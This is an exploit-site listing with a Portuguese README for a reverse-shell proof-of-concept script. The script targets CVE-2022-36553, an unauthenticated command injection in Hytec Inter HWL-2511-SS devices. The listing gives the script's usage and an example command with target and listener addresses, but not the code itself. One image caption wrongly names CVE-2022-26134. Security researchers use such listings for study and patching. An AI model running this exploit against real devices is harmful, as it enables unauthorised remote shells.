Sploitus

Exploit for CVE-2022-36553-PoC

kitploit · 2026-08-24

Exploit Code

MARKDOWN29 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0XNSLABS-CVE-2022-36553-POC
# CVE-2022-36553 - Hytec Inter HWL-2511-SS Injeção de Comando Remoto Não Autenticado.

## Visão Geral

Este repositório contém um script de shell reverso de Prova de Conceito (PoC) para explorar o CVE-2022-36553, uma vulnerabilidade crítica em dispositivos Hytec Inter HWL-2511-SS. O script é uma demonstração prática, complementando a análise aprofundada fornecida no meu post do blog "Hytec Inter HWL-2511-SS - Relatório de Vulnerabilidade".

### Versões afetadas

Todos os dispositivos Hytec Inter HWL-2511-SS da versão 1.05 e anteriores.

### Uso do Script PoC

root@kitploit:~
    
    
    # Usage: python HWL-2511-SS.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
    # Example: python HWL-2511-SS.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444
    

### Vídeo de Prova de Conceito

![Script PoC do CVE-2022-26134](https://assets.kitploit.com/production/public/readmes/14320/134e29deac960c4c03854e25279195a9e59ace12e6d8a3008021c5a92581a099.jpg)

![Hytec Inter HWL-2511-SS Injeção de Comando Remoto Não Autenticado](https://assets.kitploit.com/production/public/readmes/14320/c56bc56220b54688b209799eb7dec38a8abb5b708a213eb2f5f1a57d15c9ceba.png)

### Nota

APENAS PARA FINS EDUCACIONAIS.